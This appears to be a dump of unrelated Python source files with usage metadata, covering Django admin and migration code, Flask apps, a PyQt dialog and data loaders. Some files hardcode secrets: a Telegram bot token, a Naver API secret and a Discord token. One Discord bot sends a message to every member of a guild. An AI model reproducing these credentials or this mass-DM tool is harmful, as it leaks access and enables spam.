"admin_app.core.utils.options.DEFAULT_FIELDSETS", "line_number": 97, "usage_type": "name"}, {"api_name": "admin_app.core.utils.options.DEFAULT_FIELDSETS", "line_number": 101, "usage_type": "name"}, {"api_name": "admin_app.core.utils.options.DEFAULT_FIELDSETS", "line_number": 105, "usage_type": "name"}, {"api_name": "admin_app.core.utils.widgets.AutocompleteWidget", "line_number": 132, "usage_type": "call"}, {"api_name": "admin_app.events.models.Event", "line_number": 132, "usage_type": "name"}, {"api_name": "admin_app.core.utils.widgets.AjaxChosenWidget", "line_number": 133, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 137, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 137, "usage_type": "name"}, {"api_name": "django.forms.DateField", "line_number": 138, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 138, "usage_type": "name"}, {"api_name": "datetimewidget.widgets.DateWidget", "line_number": 141, "usage_type": "call"}, {"api_name": "django.forms.DateField", "line_number": 147, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 147, "usage_type": "name"}, {"api_name": "datetimewidget.widgets.DateWidget", "line_number": 150, "usage_type": "call"}, {"api_name": "django.forms.MultipleChoiceField", "line_number": 156, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 156, "usage_type": "name"}, {"api_name": "admin_app.core.utils.constants.WEEK_DAYS", "line_number": 157, "usage_type": "name"}, {"api_name": "django.forms.CheckboxSelectMultiple", "line_number": 160, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 160, "usage_type": "name"}, {"api_name": "dateutil.rrule.rrule", "line_number": 167, "usage_type": "call"}, {"api_name": "dateutil.rrule", "line_number": 167, "usage_type": "name"}, {"api_name": "dateutil.rrule.DAILY", "line_number": 168, "usage_type": "attribute"}, {"api_name": "dateutil.rrule", "line_number": 168, "usage_type": "name"}, {"api_name": "django.forms.ModelForm.clean", "line_number": 177, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 177, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 177, "usage_type": "name"}, {"api_name": "django.core.exceptions.ValidationError", "line_number": 195, "usage_type": "call"}, {"api_name": "admin_app.events.models.Session.objects.get_or_create", "line_number": 210, "usage_type": "call"}, {"api_name": "admin_app.events.models.Session.objects", "line_number": 210, "usage_type": "attribute"}, {"api_name": "admin_app.events.models.Session", "line_number": 210, "usage_type": "name"}, {"api_name": "admin_app.events.models.EventPlace", "line_number": 222, "usage_type": "name"}, {"api_name": "django.contrib.staticfiles.storage.staticfiles_storage.url", "line_number": 229, "usage_type": "call"}, {"api_name": "django.contrib.staticfiles.storage.staticfiles_storage", "line_number": 229, "usage_type": "name"}, {"api_name": "admin_app.core.utils.admin.ReadonlyInline", "line_number": 237, "usage_type": "name"}, {"api_name": "admin_app.events.models.Event", "line_number": 238, "usage_type": "name"}, {"api_name": "django.contrib.admin.TabularInline", "line_number": 255, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 255, "usage_type": "name"}, {"api_name": "admin_app.events.models.Session", "line_number": 257, "usage_type": "name"}, {"api_name": "django.contrib.admin.TabularInline", "line_number": 267, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 267, "usage_type": "name"}, {"api_name": "admin_app.events.models.EventPlace", "line_number": 268, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 273, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 273, "usage_type": "name"}, {"api_name": "admin_app.core.utils.widgets.AjaxChosenWidget", "line_number": 273, "usage_type": "name"}, {"api_name": "reversion.VersionAdmin", "line_number": 279, "usage_type": "attribute"}, {"api_name": "django.db.models.ForeignKey", "line_number": 289, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 289, "usage_type": "name"}, {"api_name": "admin_app.core.utils.widgets.AjaxChosenWidget", "line_number": 289, "usage_type": "name"}, {"api_name": "django.contrib.admin.utils.unquote", "line_number": 310, "usage_type": "call"}, {"api_name": "django.core.exceptions.PermissionDenied", "line_number": 312, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 314, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 315, "usage_type": "call"}, {"api_name": "django.utils.encoding.force_text", "line_number": 317, "usage_type": "call"}, {"api_name": "django.utils.html.escape", "line_number": 318, "usage_type": "call"}, {"api_name": "admin_app.core.utils.tools.replace_obj_var", "line_number": 331, "usage_type": "call"}, {"api_name": "admin_app.core.utils.tools", "line_number": 331, "usage_type": "name"}, {"api_name": "django.forms.formsets.all_valid", "line_number": 335, "usage_type": "call"}, {"api_name": "django.core.urlresolvers.reverse", "line_number": 337, "usage_type": "call"}, {"api_name": "admin_app.core.utils.tools.replace_obj_var", "line_number": 346, "usage_type": "call"}, {"api_name": "admin_app.core.utils.tools", "line_number": 346, "usage_type": "name"}, {"api_name": "django.contrib.admin.helpers.AdminForm", "line_number": 351, "usage_type": "call"}, {"api_name": "django.contrib.admin.helpers", "line_number": 351, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 369, "usage_type": "call"}, {"api_name": "django.contrib.admin.helpers.AdminErrorList", "line_number": 375, "usage_type": "call"}, {"api_name": "django.contrib.admin.helpers", "line_number": 375, "usage_type": "name"}, {"api_name": "admin_app.core.utils.tools.replace_obj_var", "line_number": 384, "usage_type": "call"}, {"api_name": "admin_app.core.utils.tools", "line_number": 384, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 303, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_protect", "line_number": 303, "usage_type": "argument"}, {"api_name": "django.db.transaction.atomic", "line_number": 304, "usage_type": "attribute"}, {"api_name": "django.db.transaction", "line_number": 304, "usage_type": "name"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 403, "usage_type": "call"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 404, "usage_type": "call"}, {"api_name": "django.contrib.messages.SUCCESS", "line_number": 404, "usage_type": "attribute"}, {"api_name": "django.contrib.messages", "line_number": 404, "usage_type": "name"}, {"api_name": "django.http.HttpResponseRedirect", "line_number": 405, "usage_type": "call"}, {"api_name": "django.conf.urls.url", "line_number": 410, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 419, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 425, "usage_type": "call"}, {"api_name": "admin_app.core.utils.admin.EventPlaceMergeAdminMixin", "line_number": 429, "usage_type": "name"}, {"api_name": "admin_app.core.utils.admin.ContentAdminMixin", "line_number": 430, "usage_type": "name"}, {"api_name": "admin_app.core.utils.admin.AddUserMixin", "line_number": 431, "usage_type": "name"}, {"api_name": "reversion.VersionAdmin", "line_number": 432, "usage_type": "attribute"}, {"api_name": "admin_app.core.admin.GalleryInline", "line_number": 450, "usage_type": "name"}, {"api_name": "common.seo.admin.SeoInline", "line_number": 451, "usage_type": "name"}, {"api_name": "admin_app.payments.admin.PaymentInline", "line_number": 452, "usage_type": "name"}, {"api_name": "admin_app.content_properties.admin.ContentPropertyInline", "line_number": 454, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 458, "usage_type": "call"}, {"api_name": "admin_app.events.models.Event", "line_number": 458, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 458, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 458, "usage_type": "name"}, {"api_name": "django.contrib.admin.site.register", "line_number": 459, "usage_type": "call"}, {"api_name": "admin_app.events.models.EventPlace", "line_number": 459, "usage_type": "argument"}, {"api_name": "django.contrib.admin.site", "line_number": 459, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 459, "usage_type": "name"}]} {"seq_id": "148018864", "text": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('fundraising', '0031_auto_20150604_0813'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='donation',\n old_name='amount',\n new_name='subscription_amount',\n ),\n migrations.AlterField(\n model_name='donation',\n name='subscription_amount',\n field=models.DecimalField(blank=True, null=True, decimal_places=2, max_digits=9),\n preserve_default=True,\n ),\n migrations.RemoveField(\n model_name='donation',\n name='stripe_charge_id',\n ),\n ]\n", "sub_path": "fundraising/migrations/0032_auto_20150604_0813.py", "file_name": "0032_auto_20150604_0813.py", "file_ext": "py", "file_size_in_byte": 767, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "django.db.migrations.Migration", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.db.migrations", "line_number": 7, "usage_type": "name"}, {"api_name": "django.db.migrations.RenameField", "line_number": 14, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 14, "usage_type": "name"}, {"api_name": "django.db.migrations.AlterField", "line_number": 19, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 19, "usage_type": "name"}, {"api_name": "django.db.models.DecimalField", "line_number": 22, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 22, "usage_type": "name"}, {"api_name": "django.db.migrations.RemoveField", "line_number": 25, "usage_type": "call"}, {"api_name": "django.db.migrations", "line_number": 25, "usage_type": "name"}]} {"seq_id": "508532088", "text": "\"\"\"\nLive Storage Migration test helpers functions\n\"\"\"\nimport config\nfrom art.rhevm_api.tests_lib.low_level import (\n disks as ll_disks,\n)\nfrom rhevmtests.storage.helpers import prepare_disks_for_vm\n\n\ndef add_new_disk_for_test(\n vm_name, alias, provisioned_size=(1 * config.GB), sparse=False,\n disk_format=config.RAW_DISK, wipe_after_delete=False, attach=False,\n sd_name=None\n):\n \"\"\"\n Prepares disk for given vm\n \"\"\"\n disk_params = config.disk_args.copy()\n disk_params['alias'] = alias\n disk_params['active'] = False\n disk_params['provisioned_size'] = provisioned_size\n disk_params['format'] = disk_format\n disk_params['sparse'] = sparse\n disk_params['wipe_after_delete'] = wipe_after_delete\n disk_params['storagedomain'] = sd_name\n\n assert ll_disks.addDisk(True, **disk_params), (\n \"Failed to add disk %s\" % alias\n )\n ll_disks.wait_for_disks_status([alias])\n if attach:\n prepare_disks_for_vm(vm_name, [alias])\n", "sub_path": "art/tests/rhevmtests/storage/storage_migration/helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 981, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "config.GB", "line_number": 12, "usage_type": "attribute"}, {"api_name": "config.RAW_DISK", "line_number": 13, "usage_type": "attribute"}, {"api_name": "config.disk_args.copy", "line_number": 19, "usage_type": "call"}, {"api_name": "config.disk_args", "line_number": 19, "usage_type": "attribute"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks.addDisk", "line_number": 28, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks", "line_number": 28, "usage_type": "name"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks.wait_for_disks_status", "line_number": 31, "usage_type": "call"}, {"api_name": "art.rhevm_api.tests_lib.low_level.disks", "line_number": 31, "usage_type": "name"}, {"api_name": "rhevmtests.storage.helpers.prepare_disks_for_vm", "line_number": 33, "usage_type": "call"}]} {"seq_id": "314179730", "text": "from flask import Flask, render_template, request\nfrom pprint import pprint\nimport requests\n\napp = Flask(__name__)\n\n# 요청을 위한 기본 준비\ntoken = '805457410:AAGhgJeP4X79yj8TKWsrr_shUYbvjMWEZUo'\nchat_id = '749251074'\nnaver_client_id = 'bej3naFebiOt4saB3r0h'\nnaver_client_secret = '2u4UN7QruP'\n\napp_url = f'https://api.telegram.org/bot{token}'\n\n@app.route('/')\ndef hello_world():\n return 'Hello, World!'\n\n@app.route('/write')\ndef write():\n return render_template('write.html')\n\n@app.route('/send')\ndef send():\n #1. 사용자가 보낸 메시지를 받아서 text 변수에 저장하자\n text = request.args.get('msg')\n\n #2. Telegram bot이 chat_id를 가진 사람에게 메시지를 보낸다.\n message_url = f'{app_url}/sendMessage?chat_id={chat_id}&text={text}'\n\n #3. 텔레그램 서버로 메시지 전송\n requests.get(message_url)\n\n return render_template('send.html')\n\n@app.route('/telegram', methods=['POST'])\ndef telegram():\n telegram_response = request.get_json()\n # pprint(telegram_response)\n # print(request)\n\n if telegram_response.get('message') is not None:\n chat_id = telegram_response.get('message').get('chat').get('id')\n text = telegram_response.get('message').get('text')\n # requests.get(f'{app_url}/sendMessage?chat_id={chat_id}&text={text}')\n\n if text[0:4] == '/번역 ':\n headers = {\n 'X-Naver-Client-Id': naver_client_id,\n 'X-Naver-Client-Secret': naver_client_secret\n }\n\n data = {\n 'source': 'ko',\n 'target': 'ja',\n 'text': text[4:]\n }\n\n papage_response = requests.post(\n 'https://openapi.naver.com/v1/papago/n2mt',\n headers=headers,\n data=data\n ).json()\n\n # pprint(papage_response)\n text = papage_response.get('message').get('result').get('translatedText')\n requests.get(f'{app_url}/sendMessage?chat_id={chat_id}&text={text}')\n return '', 200\n\n\nif __name__ == '__main__':\n app.run(debug=True)", "sub_path": "SSAFY/Python_lecture/lectures-justin-master/StartCamp/telegram_bot/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2115, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "flask.Flask", "line_number": 5, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.request.args.get", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.request.args", "line_number": 26, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 26, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 32, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 34, "usage_type": "call"}, {"api_name": "flask.request.get_json", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 59, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 67, "usage_type": "call"}]} {"seq_id": "321498311", "text": "from PyQt5.QtWidgets import QDialog, QTreeWidget, QTreeWidgetItem, QLineEdit, QVBoxLayout, QPushButton, QHBoxLayout, QStyle\n\nfrom utils.ViewUtils import FilterTreeBySearchText\n\nclass LogicSelectDialog(QDialog):\n def __init__(self, logicsModel):\n super().__init__()\n\n self._resultLogic = None\n self._currentSelection = None\n\n self._rootLayout = QVBoxLayout()\n\n self._searchLine = QLineEdit()\n self._searchLine.setPlaceholderText(\"Search...\")\n self._searchLine.setClearButtonEnabled(True)\n self._searchLine.textChanged.connect(self._signal_searchLine_textChanged)\n self._rootLayout.addWidget(self._searchLine)\n\n self._tree = QTreeWidget()\n self._tree.setHeaderHidden(True)\n self._tree.setColumnCount(1)\n self._tree.setSortingEnabled(False)\n self._tree.currentItemChanged.connect(self._signal_tree_currentItemChanged)\n self._buildTree(self._tree.invisibleRootItem(), logicsModel.getLogics())\n self._rootLayout.addWidget(self._tree)\n\n self._buttotLayout = QHBoxLayout()\n\n self._cancelBt = QPushButton(\"Cancel\")\n self._cancelBt.clicked.connect(self._signal_cancelBt_clicked)\n self._buttotLayout.addWidget(self._cancelBt)\n\n self._addBt = QPushButton(\"Add\")\n self._addBt.clicked.connect(self._signal_addBt_clicked)\n self._addBt.setEnabled(False)\n self._buttotLayout.addWidget(self._addBt)\n\n self._rootLayout.addLayout(self._buttotLayout)\n\n self.setLayout(self._rootLayout)\n self.setWindowTitle(\"Select Entity Logic\")\n\n def _buildTree(self, rootItem, moduleLogics):\n for module in moduleLogics:\n moduleItem = QTreeWidgetItem(rootItem)\n moduleItem.setText(0, module.getName())\n moduleItem.setIcon(0, self.style().standardIcon(QStyle.SP_DirIcon))\n for logic in module.getLogics():\n item = QTreeWidgetItem(moduleItem)\n item.setText(0, logic.getName())\n item._node = logic\n\n def _signal_cancelBt_clicked(self):\n self._resultLogic = None\n self.done(0)\n\n def _signal_addBt_clicked(self):\n self._resultLogic = self._currentSelection\n self.done(0)\n\n def _signal_searchLine_textChanged(self, text):\n FilterTreeBySearchText(self._tree, text)\n\n def getResultLogic(self):\n return self._resultLogic\n\n def _signal_tree_currentItemChanged(self, currItem, prevItem):\n if currItem is not None:\n if hasattr(currItem, \"_node\"):\n self._currentSelection = currItem._node\n self._addBt.setEnabled(True)\n return\n self._currentSelection = None\n self._addBt.setEnabled(False)", "sub_path": "Sources/Editor/App/dialog/LogicSelecDialog.py", "file_name": "LogicSelecDialog.py", "file_ext": "py", "file_size_in_byte": 2766, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "PyQt5.QtWidgets.QDialog", "line_number": 5, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QVBoxLayout", "line_number": 12, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QLineEdit", "line_number": 14, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidget", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QHBoxLayout", "line_number": 28, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 30, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QPushButton", "line_number": 34, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QTreeWidgetItem", "line_number": 46, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QStyle.SP_DirIcon", "line_number": 48, "usage_type": "attribute"}, {"api_name": "PyQt5.QtWidgets.QStyle", "line_number": 48, "usage_type": "name"}, {"api_name": "PyQt5.QtWidgets.QTreeWidgetItem", "line_number": 50, "usage_type": "call"}, {"api_name": "utils.ViewUtils.FilterTreeBySearchText", "line_number": 63, "usage_type": "call"}]} {"seq_id": "346881562", "text": "import discord\nfrom discord.ext import commands\n\nclient = commands.Bot(command_prefix = 'r!')\n\n@client.event\nasync def on_ready():\n print('Ready!')\n \n\n@client.command()\nasync def dmall(ctx, global_guildid : int,*, message):\n master = [391425164123963394,600471112140324864]\n login_status = 0\n test = ctx.author.id\n for a in master:\n if test == a:\n login_status = login_status + 1\n if login_status == 1:\n guild = client.get_guild(int(global_guildid))\n msg = await ctx.channel.send('> 메시지 전송 작업이 시작되었습니다.')\n su = 0\n fa = 0\n sul = 0\n user = []\n for channelz in guild.members:\n print(channelz)\n user.append(channelz.name)\n print(user)\n for channelz in guild.members:\n \n try:\n channel2 = await channelz.create_dm()\n await channel2.send(message)\n su = su + 1\n except:\n fa = fa + 1\n pass\n try:\n sul = sul + 1\n sui = user[sul]\n print(sui)\n msg1 = '> 메시지를 전송중입니다. \\n > 전송중인 유저 : {0} \\n > {1}명에게 메시지가 전송되었습니다\\n > {2}명에게 메시지가 전송되지 않았습니다.'.format(sui,su,fa)\n await msg.edit(content=msg1)\n except:\n pass\n msg2 = '> 메시지 전송이 완료되었습니다. \\n > 총 {0}명에게 메시지가 전송되었으며\\n > {1}명에게 메시지가 전송되지 않았습니다.'.format(su,fa)\n await msg.edit(content=msg2)\n else:\n await ctx.channel.send('[Error] 등록된 사용자가 아닙니다.')\nt = 'NjgxMzA2NjI4NzY2OTU3NTc2.XlNGUg.xayXw8PM1KKct7KC1WZMu7pBAc0'\nclient.run(t)\n\n", "sub_path": "build.py", "file_name": "build.py", "file_ext": "py", "file_size_in_byte": 1858, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "discord.ext.commands.Bot", "line_number": 4, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 4, "usage_type": "name"}]} {"seq_id": "585934934", "text": "import pandas as pd \nfrom postgresql import pgConnect, pgEngine\n\ndf = pd.read_csv('global_superstore.csv')\nprint(df.head())\n\n# Initiate PostgreSQL connection to DB\nconn = pgConnect()\ncur = conn.cursor()\n\n# PostgreSQL connection doesn't work with Pandas so have initiated this engine as well with SQLAlchemy\nengine = pgEngine()\n\ndf.to_sql('global_superstore',engine, schema='prototyping',if_exists='replace')\nprint('Successfully loaded data')", "sub_path": "load_file.py", "file_name": "load_file.py", "file_ext": "py", "file_size_in_byte": 441, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pandas.read_csv", "line_number": 4, "usage_type": "call"}, {"api_name": "postgresql.pgConnect", "line_number": 8, "usage_type": "call"}, {"api_name": "postgresql.pgEngine", "line_number": 12, "usage_type": "call"}]} {"seq_id": "135642264", "text": "from Common.TradingDay import TradingDay\nfrom Common.OracleConnector import OracleConnector\nimport pandas as pd\nimport numpy as np\nfrom datetime import datetime\n\n\nclass marketdata(object):\n def __init__(self, startdate):\n # get trading days\n td = TradingDay()\n enddate = td.getLastTradingDay()\n self.tradedays = td.getDuration(startdate, enddate)\n\n # get stock list\n oc = OracleConnector()\n self.connection = oc.getConn()\n sqls_stocklist = \"select F16_1090,OB_OBJECT_NAME_1090,F23_1090,F27_1090 from WIND.TB_OBJECT_1090 where F4_1090='A'and F19_1090='0' and F21_1090='1' order by F16_1090 asc\"\n self.df_stocklist = pd.read_sql(sql=sqls_stocklist, con=self.connection)\n\n def getMarketData(self, count):\n stocklist = self.df_stocklist['F16_1090']\n df_price = pd.DataFrame()\n df_price['TRADE_DT'] = self.tradedays\n # print(df_price)\n\n for stock in stocklist[:count]:\n print(stock)\n sqls = \"\"\"select F2_1425,F4_1425,F5_1425,F6_1425,F7_1425,F8_1425,F9_1425 from WIND.TB_OBJECT_1425, WIND.TB_OBJECT_1090 where F1_1425=F2_1090 and f16_1090 ='%s'and F2_1425> '20190101' and F4_1090= 'A' order by F2_1425 asc\"\"\" \\\n % stock\n df_stock = pd.read_sql(sql=sqls, con=self.connection)\n stock_temp = '%s' % stock\n df_price[stock_temp] = df_stock['F4_1425']\n\n # df_price.to_csv('D:\\\\app\\\\test.csv', sep=',', header=True, index=True)\n print(df_price)\n\n\nclass calculation(object):\n def __init__(self):\n pass\n\n def closeprice(self,k1,k2,k3,decay,combo,k0):\n # df = pd.read_csv('D:\\\\app\\\\matlab_comparison\\\\close.csv')\n df = pd.read_csv('/home/PerformanceAnalysis/Performance/AccountMonitor/Others/close.csv')\n # print(df)\n matrix = df.as_matrix()\n size = np.shape(matrix)\n [rows, cols] = size\n matrix_temp = np.zeros(size)\n # print(matrix_temp)\n\n tic = datetime.now()\n for i in range(cols):\n for j in range(rows-k0, rows):\n x1 = matrix[j - k1 + 1:j + 1, i]\n x2 = matrix[j - k2 - k1 + 1:j - k2 + 1, i]\n x3 = matrix[j - k3 - k1 + 1:j - k3 + 1, i]\n y1 = x1 / x2\n y2 = x1 / x3\n # print(x1, x2, x3)\n\n corr = np.corrcoef(y1, y2)\n # print(corr)\n\n matrix_temp[j, i] = -corr[0][1]\n print(matrix_temp)\n toc = datetime.now()\n print('Processing time: %f seconds' % (toc - tic).total_seconds())\n\nif __name__ == '__main__':\n # startdate = '20190102'\n # mkt = marketdata(startdate)\n # mkt.getMarketData(100)\n\n cal = calculation()\n cal.closeprice(5, 1, 13, 1, 1, 1422)\n", "sub_path": "Others/testets.py", "file_name": "testets.py", "file_ext": "py", "file_size_in_byte": 2789, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "Common.TradingDay.TradingDay", "line_number": 11, "usage_type": "call"}, {"api_name": "Common.OracleConnector.OracleConnector", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.read_sql", "line_number": 31, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 50, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "numpy.corrcoef", "line_number": 63, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 68, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 68, "usage_type": "name"}]} {"seq_id": "402705504", "text": "from json import dumps\nfrom flask import Flask, request\nfrom flask_cors import CORS\nfrom auth import *\nfrom app import *\nfrom auth_admin import *\nfrom product import *\nfrom user_function import *\nfrom purchase import *\nfrom cart import *\nfrom recommend import *\nfrom search import *\nfrom chat import *\n#----------------------------------------------user login-------------------------------\n@app.route('/login', methods=['POST'])\ndef flask_login():\n j = request.json\n email = j['email']\n password = j['password']\n l = user_login(email, password)\n return dumps(l)\n\n\n@app.route('/register', methods=['POST'])\ndef flask_register():\n j = request.json\n email = j['email']\n password = j['password']\n name = j['name']\n l = user_register(email, password, name)\n return dumps(l)\n\n\n@app.route('/logout', methods=['POST'])\ndef flask_logout():\n j = request.json\n t = j['token']\n l = user_logout(t)\n return dumps(l)\n\n#----------------------------------------------admin login-------------------------------\n@app.route('/admin_login', methods=['POST'])\ndef flask_admin_login():\n j = request.json\n email = j['email']\n password = j['password']\n l = admin_login(email, password)\n return dumps(l)\n\n@app.route('/admin_logout', methods=['POST'])\ndef flask_admin_logout():\n j = request.json\n token = j['Admin']\n l = admin_logout(token)\n return dumps(l)\n\n@app.route('/admin_product', methods=['GET'])\ndef flask_admin_product():\n token = request.headers.get('Admin',None)\n l = admin_product(token)\n return dumps(l)\n\n@app.route('/admin_order', methods=['GET'])\ndef flask_admin_order():\n token = request.headers.get('Admin',None)\n l = admin_order(token)\n return dumps(l)\n\n\n@app.route('/admin_get_order', methods=['GET'])\ndef flask_admin_get_order():\n token = request.headers.get('Admin',None)\n index = request.headers.get('index',None)\n l=admin_get_order(token,index)\n return dumps(l)\n\n#----------------------------------------------product-------------------------------\n\n \n@app.route('/add_product', methods=['POST'])\ndef flask_add_product():\n j = request.json\n token = request.headers.get('Admin',None)\n category_id = j['category_id']\n name = j['name']\n detail = j['detail']\n price = j['price']\n stock = j['stock']\n tag=j['tag']\n first_p=j['first_p']\n second_p=j['second_p']\n l = add_product(token,category_id,name,detail,price,stock,tag,first_p,second_p)\n return dumps(l)\n\n@app.route('/delete_product/', methods=['PUT'])\ndef flask_delete_product(id):\n id=int(id)\n token = request.headers.get('Authorization',None)\n l=delete_product(token,id)\n return dumps(l)\n\n@app.route('/update_information', methods=['POST'])\ndef flask_update_information():\n j = request.json\n token = request.headers.get('Admin',None)\n id=j['id']\n category_id = j['category_id']\n name = j['name']\n detail = j['detail']\n price = j['price']\n stock = j['stock']\n tag=j['tag']\n first_p=j['first_p']\n second_p=j['second_p']\n l = update_information(token,id,category_id,name,detail,price,stock,tag,first_p,second_p)\n return dumps(l)\n\n\n@app.route('/change_detail', methods=['PUT'])\ndef flask_change_detail():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n detail = j['detail']\n l = chang_detail(token, id, detail)\n return dumps(l)\n\n@app.route('/add_tag', methods=['PUT'])\ndef flask_add_tag():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n tag = j['tag']\n l = add_tag(token, id, tag)\n return dumps(l)\n\n@app.route('/change_tag', methods=['PUT'])\ndef flask_change_tag():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n tag = j['tag']\n l = change_tag(token, id, tag)\n return dumps(l)\n\n@app.route('/change_status', methods=['PUT'])\ndef flask_change_status():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n status = j['status']\n l = change_status(token, id, status)\n return dumps(l)\n\n@app.route('/change_stock', methods=['PUT'])\ndef flask_change_stock():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n stock= j['stock']\n l = change_stock(token, id, stock)\n return dumps(l)\n\n@app.route('/change_price', methods=['PUT'])\ndef flask_change_price():\n j = request.json\n token = request.args.get(\"token\")\n id = request.args.get(\"id\")\n price = j['price']\n l = change_stock(token, id, price)\n return dumps(l)\n\n@app.route('/get_product/', methods=['GET'])\ndef flask_get_product(category):\n return dumps(get_by_category(category))\n\n@app.route('/get_number/', methods=['GET'])\ndef flask_get_number(category):\n return dumps(get_number_by_category(category))\n\n@app.route('/get_one_product/', methods=['GET'])\ndef flask_get_one_product(id):\n id=int(id)\n return dumps(get_one_product(id))\n\n\n@app.route('/update_first_photo', methods=['PUT'])\ndef flask_update_first_photo():\n j = request.json\n id = request.args.get(\"id\")\n token = request.args.get(\"token\")\n photo = j['photo']\n return dumps(update_first_photo(photo))\n\n@app.route('/update_second_photo', methods=['PUT'])\ndef flask_update_second_photo():\n j = request.json\n id = request.args.get(\"id\")\n token = request.args.get(\"token\")\n photo = j['photo']\n return dumps(update_second_photo(photo))\n#----------------------------------------------user function-------------------------------\n\n@app.route('/change_password', methods=['PUT'])\ndef flask_change_password():\n j = request.json\n token = request.headers.get('Authorization',None)\n password = j['password']\n current_password = j['current_password']\n l = change_password(token,current_password, password)\n return dumps(l)\n\n\n@app.route('/change_name', methods=['PUT'])\ndef flask_change_name():\n j = request.json\n token = request.headers.get('Authorization',None)\n name = j['name']\n l = change_name(token,name)\n return dumps(l)\n\n\n#----------------------------------------------purchase-------------------------------\n\n\n@app.route('/purchase_product', methods=['POST'])\ndef flask_purchase_product():\n token = request.headers.get('Authorization',None)\n l = purchase_product(token)\n return dumps(l)\n\n@app.route('/review_By_time', methods=['POST'])\ndef flask_review_By_time():\n j = request.json\n token = request.args.get(\"token\")\n day = request.args.get(\"day\")\n l = review_By_time(token,day)\n return dumps(l)\n\n@app.route('/get_cost_By_Time', methods=['POST'])\ndef 